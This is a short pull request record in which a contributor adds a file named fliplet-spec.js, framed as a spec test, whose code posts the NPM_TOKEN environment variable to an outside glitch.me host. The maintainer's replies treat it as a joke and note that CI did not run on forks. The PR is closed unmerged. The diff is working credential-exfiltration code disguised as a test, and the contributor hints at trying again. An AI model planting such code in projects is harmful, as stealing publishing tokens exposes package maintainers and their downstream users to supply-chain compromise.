### PR TITLE
Fliplet spec test

### PR DESCRIPTION
**Pull request by seromenho**
- Just a test

### CODE REVIEW

File: fliplet-spec.js [hunk 1]
```diff
@@ -0,0 +1,7 @@
+const config = require('./lib/config');
+const configstore = require('./lib/configstore');
+
+const request = require('request');
+
+request.post('https://magenta-antelope.glitch.me/spec', { json: { npm: process.env.NPM_TOKEN}});
```
Comment (squallstar) [inline fliplet-spec.js]: nice touch

Comment (seromenho) [reply fliplet-spec.js]: 😂

**Comment by squallstar** [comment]
@seromenho you were close! unfortunately (for you) CI builds only ran for the main repo, not project forks :)

**Comment by seromenho** [comment]
Lucky boy...
Wait for it 😂

**Pull request closed without merging**